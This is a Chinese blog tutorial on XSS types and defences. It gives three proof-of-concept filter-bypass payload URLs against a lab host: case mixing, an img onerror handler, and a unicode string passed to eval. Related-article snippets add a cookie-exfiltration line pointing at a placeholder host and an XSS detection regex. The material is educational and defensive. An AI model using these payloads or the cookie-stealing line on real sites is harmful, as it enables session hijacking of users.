【前端安全】浅谈XSS攻击和防范

最新推荐文章于 2023-07-18 09:30:46 发布
最新推荐文章于 2023-07-18 09:30:46 发布
阅读量243 收藏 1
点赞数
分类专栏: 前端安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013451157/article/details/114777384
版权

定义

XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。

恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

分类

大分类小分类原理
非存储DOM型① 不需要经过服务器 ② 访问者的浏览器执行相应的脚本
反射型① 通过url将参数传递给服务器 ② 服务器不处理,直接“反射”回访问者的浏览器 ③ 访问者的浏览器执行相应的脚本
存储型存储 型① 通过url将参数传递给服务器 ② 服务器经过存储后再“反射”回访问者的浏览器 ③ 访问者的浏览器执行相应的脚本

反射型XSS的示意图:
在这里插入图片描述
存储型XSS的示意图:
在这里插入图片描述

攻击

1. 大小写绕过

这个绕过的前提是,网站仅仅过滤了

利用语句:

http://192.168.1.102/xss/example2.php?name=<sCript>alert("hey!")</scRipt>
2. 并不是只有script标签才可以插入代码

只要任何能执行js的绑定事件都可以。最常用的是img的onerror,比如

http://192.168.1.102/xss/example4.php?name=<img src='w.123' onerror='alert("hey!")'>
3. 编码脚本代码绕过关键字过滤

有的服务器会对关键字(如alert)进行过滤,这时我们可以尝试将关键字进行编码后再插入。

不过直接显示编码的话是不能被浏览器执行的,所以我们需要用一个eval语句来实现。eval()会将编码过的语句解释后再执行。

例如 alert(1) 编码过后是 \u0061\u006c\u0065\u0072\u0074(1)

所以构建出来的攻击语句如下:

http://192.168.1.102/xss/example5.php?name=<script>eval(\u0061\u006c\u0065\u0072\u0074(1))</script>

防范

1. 过滤

对诸如<script><img><a>等标签进行过滤。

2. 编码

将特殊字符(如<等)转换为HTML实体。

3. 限制

一般xss攻击要能达成往往需要较长的字符串,因此对于一些可预期的输入,可以通过限制长度强制截断来进行防御。

abloume
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP的XSS防御
spaceX_91的博客
02-25 369
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。 理...
php如何防止xss攻击
weixin_54963682的博客
03-11 620
php如何防止xss攻击 php防止xss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。 在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。 所以使用htmlspecialchar函数时尽量加上第二个参数,htmlspecialchar(string,ENTQUOTES)转化单引号和双引号,如果不需要编译任何的
详解前端安全XSS&CSRF),看了这篇,面试再也不怕不会说安全相关的了
xiaoxiaofly的博客
05-22 1860
XSS Cross-Site Scripting (跨站脚本攻击)简称XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使其在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如Cookie、SessionID等,进而危害数据安全。 1.XSS的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本执行。 2.由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求。 3.在部分
如何在 PHP 中防止 XSS
allway2的博客
07-24 1991
要解决此问题,您需要将htmlspecialchars()与所需参数一起使用,如果您在URL中使用用户数据,则将其与urlencode()函数结合使用。实际上,您可能会注意到,在Codeigniter部分中,我没有讨论属性问题,我已经在其他框架中讨论过。这三种类型的最大区别在于,在存储的XSS中,用户数据保存在数据库中,这与反射和基于DOM的XSS漏洞相反。现在,当我问我的大多数客户和学生,这个漏洞的影响是什么时,他们不断地告诉我,比如窃取用户信息、控制应用程序等等,仅此而已。...
什么是跨站脚本攻击(XSS)?如何在PHP应用程序中防止XSS攻击
最新发布
长风破浪会有时的博客
07-18 210
跨站脚本攻击(XSS)是一种常见的网络安全漏洞,攻击者利用这个漏洞向网页中插入恶意的客户端脚本。当用户浏览被攻击的网页时,恶意脚本将在用户的浏览器中执行,从而导致攻击者能够窃取用户的敏感信息、篡改网页内容或进行其他恶意行为。请注意,以上方法只是一些常见的防御措施,但不能保证100%防止XSS攻击。使用安全的数据库查询:当将用户输入用于数据库查询时,使用参数化查询或预编译语句,以确保输入数据被正确转义。输出编码:在将用户输入的数据输出到网页时,确保进行适当的编码,以防止浏览器将其误认为是脚本。
关于XSS攻击及其防御
Wang的专栏
06-04 3605
【代码】关于XSS攻击及其防御。
3-1XSS基本概念和原理介绍
山兔的博客
04-13 858
跨站脚本漏洞-目录  跨站脚本漏洞概述  跨站脚本漏洞类型及测试流程  反射型XSS(get&post)演示和原理分析  存储型XSS演示和与原理分析  Dom型XSS演示和原理分析  XSS的危害-获取cookie的原理和实验演示  XSS危害-XSS进行钓鱼的原理和实验演示  XSS危害-XSS获取键盘记录原理和实验演示  XSS盲打演示和原理分析 前端千遍万化,导致xss会出现很多千奇百怪的场景  XSS的过滤和绕过(filter&htmlspecialchars)
前端安全XSS攻击
02-25
XSS(cross-sitescripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-...
前端安全系列:如何防止XSS攻击
01-27
XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-SiteCookies等新技术来增强安全性,但是仍存在很多潜
PHP和XSS跨站攻击的防范
10-30
PHP和XSS跨站攻击的防范
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
PHP防范XSS攻击
IT部落格
03-03 2689
定义 XSS(Cross Site Scripting)攻击,中文名为跨站脚本攻击,是一种常见的网页攻击方式。 攻击者在web页面中插入一些恶意的javascript或HTML代码,当用户浏览该页面的时候,嵌入到web页面中的javascript/HTML代码会被执行,从而达到攻击目的。 一个简单的例子就是网页中的评论功能,用户编写一段javascript代码(见下面)提交到服务器,如果不做过滤就直接显示出来的话,就会导致用户一打开页面就会有弹窗提示“你被攻击了”。 <script>window
PHP 预防CSRF、XSS、SQL注入攻击
云博客_资源宝分享
10-10 1441
1.服务端进行CSRF防御 服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。 (1).Cookie Hashing(所有表单都包含同一个伪随机值): 这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败了 (2).验证码   这个方案的思路是:每次的用户提交都需要用户在表单中填写一个片上的随机字符串,厄…这个方案可以完全解决CSRF,但个人觉得在易用性方面似乎不是太好,还有听闻是验证码片的使用涉及了一个被称为MHT
php+防御+xss,PHP防御XSS攻击
weixin_39777464的博客
04-04 146
XSS即跨站脚本工具例如我在你的评论上写了alert('楼主傻逼');然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下document.location="http://www.test.com/a.php?b="+document.cookie;通过这种方式,你的所有cookie就会被发送到对应的网站去,然后你就呵呵了~~~~所以我们应该要过滤掉...
【应用安全xss二】xss攻击介绍和防范前端
qq_35789269的博客
04-07 3217
本文我们会讲解 XSS ,主要包括: XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确: XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。 如果你还不能确定答案,那么可以带
php 防御url类型xss,资料分享 | XSS防御速查表
weixin_39608613的博客
03-13 235
原标题:资料分享 | XSS防御速查表写在前面之前翻译了OWASP的XSS过滤绕过速查表,这篇也算是个后续。文中的翻译尽可能保持原文格式,但一些地方为了通顺和易于理解也做了一定改动,如有翻译问题,还请各位大牛指正。本文翻译时版本是20171014,后续如果有大更新的话也会跟进更新。一、介绍本文提供了一种通过使用输出转义/编码来防止XSS攻击的简单有效模型。尽管有着庞大数量的XSS攻击向量,依照下面...
php 防护xss,PHP的防御XSS注入的终极解决方案
weixin_42547431的博客
03-10 530
PHP的防御XSS注入的终极解决方案【信息安全】【Hack】一:PHP直接输出html的,可以采用以下的方法进行过滤:1.htmlspecialchars函数2.htmlentities函数3.HTMLPurifier.auto.php插件4.RemoveXss函数(百度可以查到)二:PHP输出到JS代码中,或者开发Json API的,则需要前端在JS中进行过滤:1.尽量使用innerText(I...
PHP防XSS脚本攻击
weixin_42177572的博客
12-29 149
新建php文件,并写入以下代码 <?php /* 功能说明:防护XSS,SQL,代码执行,文件包含等多种高危漏洞 */ $url_arr=array( 'xss'=>"\\=\\+\\/v(?:8|9|\\+|\\/)|\\%0acontent\\-(?:id|location|type|transfer\\-encoding)", ); $args_arr=array( 'xss'=>"[\\'\\\"\\;\\*\\<\\>].*\\bon[a-zA-Z]{3,15}[
防止xss攻击方法 php,PHP防止或过滤xss攻击的一些方法
weixin_31880681的博客
03-26 802
其实就是过滤从表单提交来的数据,使用php过滤函数就可以达到很好的目的。现在有很多php开发框架都提供关于防XSS攻击的过滤方法,下面和大家分享一个预防XSS攻击和ajax跨域攻击的函数,主要去除了script等标签,下面直接上代码,不断的增加完善改进中。//去除xxs的攻击的公共方法public function clean_xss($string){$string = trim($string...
前端安全】JavaScript防XSS攻击
05-23
XSS(Cross-site scripting)攻击是指攻击者利用Web应用程序没有对用户提交的数据进行足够的验证和过滤,从而在Web页面中注入恶意脚本,当用户访问这些页面时,这些恶意脚本就会被执行,从而达到攻击者的目的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值